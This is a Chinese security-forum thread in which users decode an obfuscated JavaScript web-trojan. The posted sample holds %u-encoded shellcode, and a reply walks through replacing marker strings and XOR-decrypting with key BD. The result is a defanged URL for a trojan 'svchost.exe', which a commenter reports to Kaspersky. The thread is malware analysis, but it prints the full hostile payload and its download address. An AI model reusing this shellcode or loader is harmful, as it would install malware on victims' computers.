这个如何使用HTMLdecoder解密

fans360

1. kao='%uBDBC'
   
2. shit='%uBDBD'
   
3. var jj='%'+'u'+'4B5B';
   
4. cao='%uBDD7'
   
5. varkk='%'+'u'+'CD36';
   
6. varll='%'+'u'+'BD8F';
   
7. varmm='%'+'u'+'E9D0';
   
8. hua4='%u5858%u5858';
   
9. varoo='%uFB7A';
   
10. varWMAHWM='BAHWM4627AHWMA';
    
11. varLHAH='%'+'u'+'5+'8'+'5'+'8'+'%'+'u'+'58'+'58'+'%u10EB'+jj+'%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%'+'u';varHHAH='05EB%'+'uEBE8%uFFFF%u54FF%uBEA3'+shit+'%uD9E2%u8D1C'+shit+'%';
    
12. varSSAH='u36BD%uB1FD'+kk+'%u10A1%'+'uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%'+'u2DBD'+'%';
    
13. 
    
14. varoah='u455F%u8ED5'+ll+'%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%u';
    
15. 
    
16. varorg='u2355%uBDBF%'+'u';
    
17. oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+shit+'%';
    
18. varorg1='%'+'uD2D5%uBDD3%';
    
19. oah+='uC8D5%uD1CF'+mm+'%uAB42%u7D38%uAEC8'+org1+'uD5BD%uCFC8%uD0D1%u36E9';
    
20. varorg2='uD355%'+'uBDBF%';
    
21. oah+='%uB1FB%u3355'+kao+'%u36BD%uD755%uE4BC%'+org2+'u5FBD%';
    
22. varorg3='%'+'u8ED1%uBD8F%'+'u';
    
23. oah+='uD544'+org3+'CED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2'+shit+'%u';
    
24. varorg4='5E4%'+'uBFF';
    
25. oah+='5536%uBCD7%u5'+org4+'2'+shit+'%u445F%u513C%uBCBD'+shit+'%';
    
26. varorg5='uBDD7%'+'uA7D7%';
    
27. oah+='u6136%u7E3C%uBD3D'+shit+'%'+org5+'uD7EE%';
    
28. varorg6='uC8BD%u7A44%'+'u';
    
29. oah+='u42BD%uE1EB%u7D8E%u3DFD%uBE81%'+org6+'BEB9%uDBE1%uD893%';
    
30. varorg7='C5%'+'uBDBD%u748E%'+'uEC';
    
31. oah+='uF97A%uB9BE%uD8'+org7+'EC%uEAEE%u8EEC%u367D%uE5FB%';
    
32. varorg8='uBDBC%'+'u3EBD%uBD';
    
33. oah+='u9F55%'+org8+'45%u1E54'+shit+'%u2DBD%uBDD7%uBDD7%uBED7%';
    
34. varorg9='EE7D%uFB36%'+'u55';
    
35. oah+='uBDD7%uBFD7%uBDD5'+shit+'%u'+org9+'99%uBCBC'+shit+'%';
    
36. varorg10='7DD%uEDBD%'+'uEB42%u3495%'+'uD';
    
37. oah+='uFB34%uD'+org10+'9FB%uFB36%uD7DD%uD7BD%uD7BD%';
    
38. varorg11='BD%uEB42%'+'uD791%uD';
    
39. oah+='uD7BD%uD7B9%uED'+org11+'7BD%uD7BD%uD5BD%uBDA2%uBDB2%';
    
40. varorg12='u36C5%'+'uD9F3%uC13D%u4';
    
41. oah+='u42ED%u81EB%uFB34%'+org12+'2B5%uC909%u3DB1%uB5C1%';
    
42. oah+='uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B'+shit+'%u7ABD%uCDFB'+shit+'%u';
    
43. oah+='BDBD'+oo+'%uBDC9'+shit+'%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%';
    
44. oah+='u42ED%u85EB%u3B36%uBD3D'+shit+'%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u4';
    
45. oah+='2DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uB';
    
46. oah+='FBD'+shit+'%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364';
    
47. oah+='E%u3671%'+'u3E64%uAD7E%'+'u7D8E%uECED%uEDEE%uEDED%uEDED%uEAE';
    
48. oah+='D%uEDED%uEB42%u36B5%uE9C3%uAD55'+kao+'%u55BD%uBDD8'+shit+'%uD';
    
49. oah+='ED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955'+shit+'%u3';
    
50. oah+='4BD%u81FB%u1CD9%uBDB9'+shit+'%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%';
    
51. oah+='uADFB%uB555'+shit+'%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%';
    
52. oah+='u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B5';
    
53. oah+='5'+shit+'%u7EBD%u1D55'+shit+'%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E'+shit+'%u5';
    
54. oah+='13C%uBCBD'+shit+'%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%';
    
55. oah+='uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A8';
    
56. oah+='4%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uF';
    
57. oah+='A7A%u259D%uADB7%uD945%u8D1C'+shit+'%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD';
    
58. oah+='74A%uE4B9%uE955'+shit+'%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36';
    
59. oah+='E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88'+shit+'%u445F%u428E%u42EA%uB9EB%uBF56%u7E';
    
60. oah+='E5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7';
    
61. oah+='E%u6136%uD7EE%uD5FD%uADBD'+shit+'%u36EA%u9DFB%uA555%u4242%uE542%uEC7';
    
62. oah+='E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB26';
    
63. oah+='6%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE33';
    
64. oah+='6%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u';
    
65. oah+='673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA37';
    
66. oah+='6%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u18';
    
67. oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u';
    
68. 
    
69. 
    
70. varoaho='ADB7AHWM3D45AHWM126'+WMAHWM+'8EEAHWMd5dbAHWMc9c9AHWM87cdAHWM9292AHWMd3d9AHWM8bdbAHWMd993AHWMdbd3AHWM8d8fAHWM858cAHWMde93AHWM92d3AHWMcbceAHWMd5deAHWMced2AHWM93c9AHWMc5d8AHWMbdd8';

复制代码

幸福的猪猪

Fans360:

你好！


解密要用到的相关代码：

varWMAHWM='BAHWM4627AHWMA';

varoaho='ADB7AHWM3D45AHWM126'+WMAHWM+'8EEAHWMd5dbAHWMc9c9AHWM87cdAHWM9292AHWMd3d9AHWM8bdbAHWMd993AHWMdbd3AHWM8d8fAHWM858cAHWMde93AHWM92d3AHWMcbceAHWMd5deAHWMced2AHWM93c9AHWMc5d8AHWMbdd8';

把红色部分的代码替换为第一段代码引号之内的代码：

替换好的之后的代码：

varoaho='ADB7AHWM3D45AHWM126BAHWM4627AHWMA8EEAHWMd5dbAHWMc9c9AHWM87cdAHWM9292AHWMd3d9AHWM8bdbAHWMd993AHWMdbd3AHWM8d8fAHWM858cAHWMde93AHWM92d3AHWMcbceAHWMd5deAHWMced2AHWM93c9AHWMc5d8AHWMbdd8'

把AHWM这个关键字替换为%u  （也可以使用redoce 本身右键的功能，选定要替换的代码，点击"替换为%u" )

得出：

varoaho=%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ud3d9%u8bdb%ud993%udbd3%u8d8f%u858c%ude93%u92d3%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8'

最后一步,使用redoce的 解密 功能 > 5>Unicode清除(%u,\u)(参数/无参数)     解密参数  >  bd

hxxp://dnf6.dnf2018.cn/svchost.exe

木马程序，卡巴斯基启发式报警。样本打包上报。

fans360

怪哉难道我电脑问题吗，我自己也是这么来解密的，执行5之后，界面空白。。。

fans360

回复 2楼 幸福的猪猪  的帖子


    前面一堆都是垃圾代码，明白了，为什么参数是BD？

雨宫优子

回复 4楼 fans360  的帖子

这个...在调试时就可以看到用shellcode用BD密钥解密自身了...不过现在已经有枚举功能啦

因此不用再去调试了呢

是昔流芳

回复 4楼 fans360  的帖子

密钥蒙也要蒙BD，出现频率最高了

   

fans360

回复 6楼 是昔流芳  的帖子


    哇咔咔，我猜我猜我猜猜猜！

taoyuan237

其实蒙这个方法挺好
国内网马基本上都可以蒙出来
只有个别不行